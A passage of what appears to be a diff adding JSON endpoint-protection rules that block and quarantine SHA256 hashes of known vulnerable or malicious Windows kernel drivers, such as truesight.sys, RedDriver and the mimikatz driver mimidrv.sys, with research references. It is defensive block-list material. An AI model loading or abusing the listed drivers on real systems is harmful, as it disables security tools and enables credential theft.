+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821637Z",
+ "creation_date": "2026-03-23T11:45:31.821639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821645Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f147b1c5060d3e9305f3a09e03bab079bdc7a964d55e95010a66a7b41981d4d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9cf4752c-0123-58c1-b076-feed5de72170",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494354Z",
+ "creation_date": "2026-03-23T11:45:31.494358Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2e3825b2dcdba02bdf30c50735b41accf42da061fb0cbc8da28dbe5dc66394d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9cf79c39-5497-54be-8cdd-b150df53f77d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984547Z",
+ "creation_date": "2026-03-23T11:45:29.984549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4530235508b99dffe4e912cc9cac7bdc237e79f5a331f601c43ba909d7a3af4a",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d008f86-67a2-5015-a43a-906aa897f8c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498808Z",
+ "creation_date": "2026-03-23T11:45:31.498812Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498822Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85a384142482e7ae94a3f9b37cd1270391c70731cf3c166167cd763061ad837c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d192b50-4c4e-5273-96c9-65fbd3d1b74a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985867Z",
+ "creation_date": "2026-03-23T11:45:29.985882Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985887Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30061ef383e18e74bb067fbca69544f1a7544e8dc017d4e7633d8379aff4c3c3",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d1be502-8b7a-5a1b-9e37-693541c97ca0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821049Z",
+ "creation_date": "2026-03-23T11:45:30.821052Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f93e0d776481c4ded177d5e4aebb27f30f0d47dcb4a1448aee8b66099ac686e1",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d1d9634-194e-5459-99a3-03cbe3e9b75d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816472Z",
+ "creation_date": "2026-03-23T11:45:30.816474Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816480Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0afba623a3ae2726112c6458c212bb48b210566851b7604ed3fbb880ffd3859f",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d20e6e4-2677-50c7-a41d-fec7be678133",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607071Z",
+ "creation_date": "2026-03-23T11:45:29.607073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607081Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cddd341f267a6094f7bd7d1b56427ebc029ccb348e7f0714d9301c2c67fdd5df",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d29b928-3941-5375-894b-e2cb6018c08d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499485Z",
+ "creation_date": "2026-03-23T11:45:31.499488Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a031cd87ef68c07233810f837490d4ffba620cf8e4504f51bf82b4f86602a022",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d29e34d-1e83-5940-bd93-f9e644666667",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495285Z",
+ "creation_date": "2026-03-23T11:45:31.495288Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "147ac26b660ed4e681e0458e032aeda8c0f0b06abd11c707399a4f0edf063de7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d2a71e5-c7e3-5439-b6f3-51cb4b2aab37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145791Z",
+ "creation_date": "2026-03-23T11:45:32.145793Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f06493341f9f16b9d25a3a5e07851dd04b63f36904a21ec1da30bfcb9157724c",
+ "comment": "Malicious Kernel Driver (aka driver_5d61e4ea.sys) [https://www.loldrivers.io/drivers/0215d6d6-e0c4-4a11-bd3a-40511f89d736/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d310a62-9d3d-5977-8cfb-458d3357d46c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452489Z",
+ "creation_date": "2026-03-23T11:45:30.452492Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da70fa44290f949e9b3e0fcfe0503de46e82e0472e8e3c360da3fd2bfa364eee",
+ "comment": "Malicious Kernel Driver (aka c94f405c5929cfcccc8ad00b42c95083.sys) [https://www.loldrivers.io/drivers/ddefecdd-9410-46d9-8957-e23aac1aba0c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d31e4f0-b12c-520e-b15c-ba748aeb764e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981183Z",
+ "creation_date": "2026-03-23T11:45:29.981185Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981190Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ba224af60a50cad10d0091c89134c72fc021da8d34a6f25c4827184dc6ca5c7",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d32aa4f-8f6d-5ae0-a0b4-12105a18e2d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148295Z",
+ "creation_date": "2026-03-23T11:45:31.148296Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8a092df8fa7012c64769563307b8c39447da1470e6f3b4a324ff98b7549433d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d38d6bc-d7fe-5e7a-bb9c-b92d068c0100",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456537Z",
+ "creation_date": "2026-03-23T11:45:30.456540Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456549Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3e95b8d8cbb0c4c3bb78d929408b37fd3b8f305b6234f7f03954465d52454eb",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d3db35e-3ec0-535a-a73f-7e86823ed1a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831127Z",
+ "creation_date": "2026-03-23T11:45:30.831129Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831135Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbba49d8b079613d8fe81944224fcc6e52e71a1eca54cd94ebbf891c091f5ea0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d3fb3ab-1a3d-58d2-9085-d8a25ec9a96a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146618Z",
+ "creation_date": "2026-03-23T11:45:31.146620Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146626Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fb37657d0f6eb3968be2049eb3135614e33a7b5354f0fa19938b4e07389236a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d628084-850c-5abe-a1d8-03dda5a56313",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498361Z",
+ "creation_date": "2026-03-23T11:45:31.498364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498373Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ecc3bf10c95d05622f596ec6f6ca85af85e5dd9c1ab5442052856dbbd62e774",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d6b7f94-66e3-5745-9abd-541b3c5a2ca8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452828Z",
+ "creation_date": "2026-03-23T11:45:30.452832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452841Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18f306b6edcfacd33b7b244eaecdd0986ef342f0d381158844d1f0ee1ac5c8d7",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d7b1d3c-3ddf-5138-ba70-299e21b66c0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153396Z",
+ "creation_date": "2026-03-23T11:45:31.153399Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153408Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89ea6406a18fadbe53c31e678a9bcb6648e6e1b1c11eae319df5d4ee45b7cfc6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d7edbf3-734e-5d9c-a3ad-46ed539d8418",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970781Z",
+ "creation_date": "2026-03-23T11:45:29.970785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970794Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68191d76aaafb52bbec5240c3b371e7dd77ff442b4a3394b41cc402402b43717",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d7f11c3-249d-5775-b0ba-0028d6fb8d1d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811381Z",
+ "creation_date": "2026-03-23T11:45:31.811383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811388Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1aa668d4a014e08274931a73971c03a27af624936b553df615a52069b6815a1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9d7fb28a-52a0-5a96-a924-2b2ffef570bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822582Z",
